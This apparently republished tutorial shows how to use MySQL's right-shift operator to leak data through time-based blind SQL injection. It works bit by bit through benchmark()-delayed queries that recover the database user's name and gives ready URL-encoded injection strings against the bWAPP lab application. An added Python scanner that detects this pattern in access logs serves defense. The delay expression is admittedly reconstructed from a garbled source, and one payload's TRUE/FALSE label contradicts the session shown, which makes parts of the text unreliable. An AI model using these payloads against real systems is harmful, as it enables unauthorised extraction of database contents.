2025-03-31 update, from SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 06/01 Report
This article shows how MySQL bit functions and operators can make time-based blind SQL injection more efficient: the right shift operator lets each character of a query result be recovered one bit at a time, so a character costs at most 8 requests. The method is simple, fast and practical, and is worked through below step by step.
The right shift operator (>>) shifts the bits of a value to the right by the given number of positions, discarding the bits that fall off the end. Shifting by one position halves the value, as the following session shows:
mysql> select ascii(b'01110010');
+--------------------+
| ascii(b'01110010') |
+--------------------+
|                114 |
+--------------------+
1 row in set (0.00 sec)

mysql> select ascii(b'01110010') >> 1;
+-------------------------+
| ascii(b'01110010') >> 1 |
+-------------------------+
|                      57 |
+-------------------------+
1 row in set (0.00 sec)
In a blind injection this can be used to enumerate the characters of a string one bit at a time: shifting the character's ASCII value right by 7, 6, ... 0 positions exposes its bits from the most significant one down, and each shifted value is compared against the bits already known. Even if the data spans the complete 8-bit ASCII table, a character therefore needs at most 8 requests, one per bit.
The data we want to extract here is the first character returned by the select user() query.
Bit 1:
We start with the first (most significant) bit. Nothing is known yet:
????????
There are two possibilities:
0 (decimal value: 0) // TRUE condition
or
1 (decimal value: 1) // FALSE condition
In the sessions below the delay branch is benchmark(10000000, sha(1)); the source listing is garbled at that point, so this expression is reconstructed. A benchmark() that runs for a couple of seconds is what makes the TRUE branch observable.
mysql> select if((ascii((substr(user(),1,1))) >> 7) = 0, benchmark(10000000, sha(1)), 'false');
+----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 7) = 0, benchmark(10000000, sha(1)), 'false') |
+----------------------------------------------------------------------------------+
| 0                                                                                |
+----------------------------------------------------------------------------------+
1 row in set (2.35 sec)
The query is delayed, so the condition is TRUE and the first bit is 0:
0???????
Bit 2:
Now we look for the value of the second bit. Shifting right by 6 leaves the first two bits, so there are again two possibilities:
00 (decimal value: 0) // TRUE condition
or
01 (decimal value: 1) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 6) = 0, benchmark(10000000, sha(1)), 'false');
+----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 6) = 0, benchmark(10000000, sha(1)), 'false') |
+----------------------------------------------------------------------------------+
| false                                                                            |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
The query is not delayed, so the condition is FALSE and the second bit is 1:
01??????
Bit 3:
Now we look for the value of the third bit, with the same two possibilities:
010 (decimal value: 2) // TRUE condition
or
011 (decimal value: 3) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 5) = 2, benchmark(10000000, sha(1)), 'false');
+----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 5) = 2, benchmark(10000000, sha(1)), 'false') |
+----------------------------------------------------------------------------------+
| false                                                                            |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
The query is not delayed, so the condition is FALSE and the third bit is 1:
011?????
Bit 4:
Now we look for the value of the fourth bit, two possibilities:
0110 (decimal value: 6) // TRUE condition
or
0111 (decimal value: 7) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 4) = 6, benchmark(10000000, sha(1)), 'false');
+----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 4) = 6, benchmark(10000000, sha(1)), 'false') |
+----------------------------------------------------------------------------------+
| false                                                                            |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
The query is not delayed, so the condition is FALSE and the fourth bit is 1:
0111????
Bit 5:
Now we look for the value of the fifth bit, two possibilities:
01110 (decimal value: 14) // TRUE condition
or
01111 (decimal value: 15) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 3) = 14, benchmark(10000000, sha(1)), 'false');
+-----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 3) = 14, benchmark(10000000, sha(1)), 'false') |
+-----------------------------------------------------------------------------------+
| 0                                                                                 |
+-----------------------------------------------------------------------------------+
1 row in set (2.46 sec)
The query is delayed, so the condition is TRUE and the fifth bit is 0:
01110???
Bit 6:
Now we look for the value of the sixth bit, two possibilities:
011100 (decimal value: 28) // TRUE condition
or
011101 (decimal value: 29) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 2) = 28, benchmark(10000000, sha(1)), 'false');
+-----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 2) = 28, benchmark(10000000, sha(1)), 'false') |
+-----------------------------------------------------------------------------------+
| 0                                                                                 |
+-----------------------------------------------------------------------------------+
1 row in set (2.44 sec)
The query is delayed, so the condition is TRUE and the sixth bit is 0:
011100??
Bit 7:
Now we look for the value of the seventh bit, two possibilities:
0111000 (decimal value: 56) // TRUE condition
or
0111001 (decimal value: 57) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 1) = 56, benchmark(10000000, sha(1)), 'false');
+-----------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 1) = 56, benchmark(10000000, sha(1)), 'false') |
+-----------------------------------------------------------------------------------+
| false                                                                             |
+-----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
The query is not delayed, so the condition is FALSE and the seventh bit must be 1:
0111001?
Bit 8:
Now we look for the value of the eighth (last) bit, two possibilities:
01110010 (decimal value: 114) // TRUE condition
or
01110011 (decimal value: 115) // FALSE condition
mysql> select if((ascii((substr(user(),1,1))) >> 0) = 114, benchmark(10000000, sha(1)), 'false');
+------------------------------------------------------------------------------------+
| if((ascii((substr(user(),1,1))) >> 0) = 114, benchmark(10000000, sha(1)), 'false') |
+------------------------------------------------------------------------------------+
| 0                                                                                  |
+------------------------------------------------------------------------------------+
1 row in set (2.33 sec)
The query is delayed, so the condition is TRUE and the eighth bit is 0:
01110010
At this point we have the complete binary value of the first character returned by select user(): 01110010, which is 114 in decimal. 114 is the ASCII code of the character r, so the first letter of the database user name is r, which the direct query confirms:
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
To illustrate this type of blind SQL injection against a real application, here is how the first and the last bit of the first character returned by select user() are enumerated on the bWAPP vulnerable application: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ (the delay expression in these strings is reconstructed as benchmark(10000000, sha(1)); the source listing is garbled there).
1. SQLi string for the first bit, returning the TRUE condition:
test%27+and+if((ascii((substr(user(),1,1))+>>+7+)=0,benchmark(10000000,sha(1)),'false')%23
2. SQLi string for the first bit, returning the FALSE condition:
test%27+and+if((ascii((substr(user(),1,1))+>>+7+)=1,benchmark(10000000,sha(1)),'false')%23
3. SQLi string for the eighth bit, returning the FALSE condition:
test%27+and+if((ascii((substr(user(),1,1))+>>+0+)=114,benchmark(10000000,sha(1)),'false')%23
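From the defender's side, the three strings above have a recognisable shape: an if() conditional, a delay primitive (benchmark() or sleep()), and a "... >> N) = V" comparison whose N walks from 7 down to 0 on one parameter. The following Python scanner is an added example, not code from the original article: it URL-decodes request targets from constructed access-log lines and flags that shape, recording the shift amount and compared value so the bit-walk is visible in the log. The /search.php path and the log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signature pieces of the bit-shift, time-based blind pattern shown above:
# an if() conditional, a delay primitive, and "... >> N) = V" on the value.
DELAY_RE = re.compile(r"\b(benchmark|sleep)\s*\(")
COND_RE = re.compile(r"\bif\s*\(")
SHIFT_RE = re.compile(r">>\s*(\d+)\s*\)?\s*=\s*(\d+)")
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify_request(target):
    """Return a finding dict for a request target that carries the
    if(... >> N) = V + delay shape, or None for anything else."""
    # Decode twice so a doubly URL-encoded payload does not slip past.
    decoded = unquote_plus(unquote_plus(target))
    decoded = re.sub(r"\s+", " ", decoded).lower()
    delay = DELAY_RE.search(decoded)
    shift = SHIFT_RE.search(decoded)
    if not (delay and shift and COND_RE.search(decoded)):
        return None
    return {"delay_fn": delay.group(1),
            "shift": int(shift.group(1)),
            "expected": int(shift.group(2))}

def scan_access_log(lines):
    """Return [(line_no, finding)] for every matching request line; a run
    with shift 7, 6, ... 0 from one source is the bit-walk of one character."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            finding = classify_request(match.group(1))
            if finding:
                findings.append((number, finding))
    return findings

# Constructed sample log (combined log format); /search.php is a placeholder
# path, not one from the article. Lines 2-4 carry the three payloads above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2025:10:00:00 +0000] "GET /search.php?title=test HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jun/2025:10:00:01 +0000] "GET /search.php?title=test%27+and+if((ascii((substr(user(),1,1))+>>+7+)=0,benchmark(10000000,sha(1)),%27false%27)%23 HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jun/2025:10:00:04 +0000] "GET /search.php?title=test%27+and+if((ascii((substr(user(),1,1))+>>+7+)=1,benchmark(10000000,sha(1)),%27false%27)%23 HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jun/2025:10:00:05 +0000] "GET /search.php?title=test%27+and+if((ascii((substr(user(),1,1))+>>+0+)=114,benchmark(10000000,sha(1)),%27false%27)%23 HTTP/1.1" 200 812',
    '10.0.0.7 - - [01/Jun/2025:10:00:06 +0000] "GET /search.php?title=what+if+(sleep)+is+a+song HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, finding in scan_access_log(SAMPLE_LOG):
        print(number, finding)
```

Response-time deltas between consecutive hits from one source (a delayed reply for TRUE, an immediate one for FALSE) corroborate the signature when the log records request duration.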
With this, the use of MySQL bit functions and operators for efficient time-based blind SQL injection should be clear; try it for yourself on the vulnerable application above.
© 2024 shulou.com SLNews company. All rights reserved.